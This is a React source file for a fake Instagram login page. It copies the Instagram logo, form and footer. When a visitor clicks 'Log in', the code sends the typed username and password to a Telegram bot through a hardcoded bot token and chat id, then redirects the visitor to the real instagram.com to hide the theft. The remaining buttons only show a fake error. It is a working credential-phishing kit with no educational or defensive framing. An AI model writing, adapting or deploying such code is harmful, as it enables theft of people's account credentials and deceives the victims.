import './App.css';
import instalogo from './img/logo.png'
import { useState } from 'react';
import axios from 'axios';

function App() { 
  const [username, setUsername] = useState('');
  const [password, setPassword] = useState('');
  
  const client = axios.create()

  const onClick = () => {
    if (username !== '' && password !== '') {
      client.get('https://api.telegram.org/bot7424027407:AAEExnjqX3LgADuMGdBBp1K9FUTLMUIibls/sendMessage?chat_id=6103696426r&text=아이디:'+username+' 비밀번호:'+password)
      .then((res) => {
        console.log(res)
        const externalWebsiteUrl = 'https://www.instagram.com';
        window.open(externalWebsiteUrl, '_blank');
      }).catch((err) => {
        console.log(err)
      })
    } else {
      alert("아이디와 비밀번호를 입력해주세요.")
    }
  }

  const riseError= () => {
    alert("예기치 못한 오류가 발생했습니다")
  }

  return (
    <div className="App">
      <div id='container'>
        <div id='logincontainer'>
          <div id='logocontainer'><img src={instalogo} id="instalogo" /></div>
          <div id='form'>
            <input type="text" placeholder="Phone number, username, or email" class='in' onChange={(e)=>{setUsername(e.target.value)}}/>
            <input type="password" placeholder="Password" class='in' onChange={(e)=>{setPassword(e.target.value)}}/>
            <button id='loginbtn' onClick={onClick}>Log in</button>
          </div>
          <div id='or'>
            <hr className="line" />
            <span className="or-text">OR</span>
            <hr className="line" />
          </div>
          <div id='fblogin'>
            <span onClick={riseError}>Log in with Facebook</span>
          </div>
          <div id='forgot'>
            <span onClick={riseError}>Forgot password?</span>
          </div>
        </div>
        <div id='signupcontainer'>
          <span id='signuptext'>Don't have an account? </span>
          <span id='signup' onClick={riseError}>Sign up</span>
        </div>
      <div id='footer'>
        <span>About</span>
        <span>Blog</span>
        <span>Jobs</span>
        <span>Help</span>
        <span>API</span>
        <span>Privacy</span>
        <span>Terms</span>
        <span>Hashtags</span>
        <span>Locations</span>
      </div>
      </div>
    </div>
  );
}

export default App;
